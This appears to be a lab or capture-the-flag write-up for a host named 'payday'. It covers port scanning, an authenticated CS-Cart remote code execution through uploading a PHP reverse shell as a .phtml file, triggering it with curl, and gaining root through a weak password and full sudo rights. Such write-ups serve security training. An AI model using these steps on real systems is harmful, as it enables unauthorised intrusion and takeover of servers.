$ nmap -p- --min-rate 3000 -Pn 192.168.157.39
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-14 13:42 +08
Nmap scan report for 192.168.157.39
Host is up (0.18s latency).
Not shown: 65527 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
993/tcp open imaps
995/tcp open pop3
CS-Cart -> RCE
Port 80 was running InternetShop CS-Cart, which looks really vulnerable:
We can take a look at the authenticated RCE, since we can login using admin:admin.
$ cat 48891.txt
get PHP shells from
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
edit IP && PORT
Upload to file manager
change the extension from .php to .phtml
visit http://[victim]/skins/shell.phtml -> Profit. ...!
We can then access admin.php with the same credentials:
Head to 'Template Editor' and upload the file that we want.
Then, just run this:
$ curl http://192.168.157.39/skins/rev.phtml
And we would get a reverse shell:
Privilege Escalation
Weak Creds -> Root
We can su to the user patrick using the password patrick. This user can run sudo for everything:
patrick@payday:/home$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for patrick:
User patrick may run the following commands on this host:
(ALL) ALL
